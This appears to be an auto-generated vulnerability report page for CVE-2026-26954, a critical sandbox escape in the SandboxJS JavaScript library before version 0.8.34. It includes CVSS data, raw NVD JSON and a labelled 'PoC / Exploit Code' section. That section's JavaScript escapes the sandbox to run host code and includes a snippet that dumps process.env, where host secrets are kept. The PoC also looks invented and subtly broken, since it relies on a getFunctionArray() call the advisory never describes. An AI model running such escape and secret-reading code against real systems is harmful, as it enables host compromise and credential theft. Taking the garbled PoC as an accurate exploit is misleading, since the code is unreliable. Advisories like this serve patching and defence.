Security Vulnerability Report
CVE-2026-26954 CVSS 10.0 CRITICAL

CVE-2026-26954

Published: 2026-03-13 19:54:31
Last Modified: 2026-03-17 20:13:06

Description

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.34, it is possible to obtain arrays containing Function, which allows escaping the sandbox. Given an array containing Function, and Object.fromEntries, it is possible to construct {[p]: Function} where p is any constructible property. This vulnerability is fixed in 0.8.34.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:* - VULNERABLE
SandboxJS < 0.8.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-26954 SandboxJS Sandbox Escape PoC
// This PoC demonstrates how to escape the SandboxJS sandbox
// by leveraging Function objects and Object.fromEntries
function escapeSandbox(sandbox) {
  // Step 1: Obtain an array containing Function
  // In vulnerable versions, arrays holding Function can be accessed
  const functionArray = sandbox.getFunctionArray();

  // Step 2: Use Object.fromEntries to construct property access
  // The key insight is that {[p]: Function} creates an object
  // where p can be any constructible property
  const constructibleProp = 'constructor';
  // Object.fromEntries takes an iterable of [key, value] pairs
  const exploitObject = Object.fromEntries([
    [constructibleProp, functionArray[0]] // Function reference
  ]);

  // Step 3: Access the global Function constructor
  const GlobalFunction = exploitObject.constructor;

  // Step 4: Execute arbitrary code outside the sandbox
  // This code runs in the host environment, not in the sandbox
  GlobalFunction('console.log("Sandbox escaped! Host code execution achieved.")')();

  // Alternative: Direct code execution via Function constructor
  GlobalFunction('/* malicious code here */')();
}

// Example of full exploitation
const maliciousCode = `
  // Read sensitive data from host environment
  const process = this.constructor.constructor('return process')();
  console.log(process.env);
`;

// Defense: Upgrade to SandboxJS >= 0.8.34

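References

https://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv (Vendor Advisory, Exploit)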

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26954", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:31.143", "lastModified": "2026-03-17T20:13:06.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SandboxJS is a JavaScript sandboxing library. Prior to 0.8.34, it is possible to obtain arrays containing Function, which allows escaping the sandbox. Given an array containing Function, and Object.fromEntries, it is possible to construct {[p]: Function} where p is any constructible property. This vulnerability is fixed in 0.8.34."}, {"lang": "es", "value": "SandboxJS es una biblioteca de sandboxing de JavaScript. Antes de 0.8.34, es posible obtener arrays que contienen Function, lo que permite escapar del sandbox. Dado un array que contiene Function, y Object.fromEntries, es posible construir {[p]: Function} donde p es cualquier propiedad construible. Esta vulnerabilidad se corrige en la versión 0.8.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.8.34", "matchCriteriaId": "21637BCD-7C1B-48F0-836C-399CD3946F7D"}]}]}], "references": [{"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}